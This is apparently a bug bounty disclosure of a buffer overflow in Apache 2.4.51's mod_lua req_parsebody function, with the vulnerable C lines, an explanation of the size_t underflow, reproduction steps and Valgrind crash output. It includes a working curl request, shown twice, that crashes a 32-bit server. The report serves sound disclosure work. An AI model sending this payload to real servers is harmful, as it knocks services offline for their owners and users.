Internet Bug Bounty: Buffer overflow in req_parsebody method in lua_request.c

Software Versions

Ubuntu - 18.04 (32-bit)
Apache 2.4.51 (32-bit)

Description

This bug is present in “req_parsebody” method of modules/lua/lua_request.c file.
Below mentioned lines of code cause this bug.

  ...
  size_t  vlen = 0;
  ...
  ...
  vlen = end - crlf - 8;
  buffer = (char *) apr_pcalloc(r->pool, vlen+1);
  memcpy(buffer, crlf + 4, vlen);
  ...

Above code does not check whether the result of (end - crlf) is greater than or equal to 8.
So it is possible to make the result of (end - crlf - 8), negative.
Sending this HTTP request causes the result to be -1.
curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua

Since “vlen” is of type “size_t”, -1 will become 4294967295. This is the maximum value of size_t data type in 32 bit systems.
Then vlen+1 is passed to apr_pcalloc method.
So the actual size allocated is 0.
Since the allocated buffer is too small there will be an overflow and crash in next memcpy statement.

Steps to Reproduce

1. Build Apache web server with Lua module
   ./configure --enable-lua=shared
   make
   make install

2. Enable Lua module with Apache web server.
   Add these lines to httpd.conf file.

  LoadModule lua_module modules/mod_lua.so
  <Files "*.lua">
   SetHandler lua-script
  </Files>

3. Copy attached F1555487 file to htdocs folder.

4. Start Apache web server in debug single worker mode.
   ./httpd -X -d /home/apache/install-directory/

5. Send this HTTP request with CURL.
   curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua
   Apache web server will crash.

Valgrind Output

Command: valgrind ./httpd -X -d /home/apache/install-directory/

Invalid write of size 1
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)
Address 0x12aec000 is not stack’d, malloc’d or (recently) free’d

Process terminating with default action of signal 11 (SIGSEGV)
Access not within mapped region at address 0x12AEC000
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)

Impact

May be possible to use in a denial of service attack.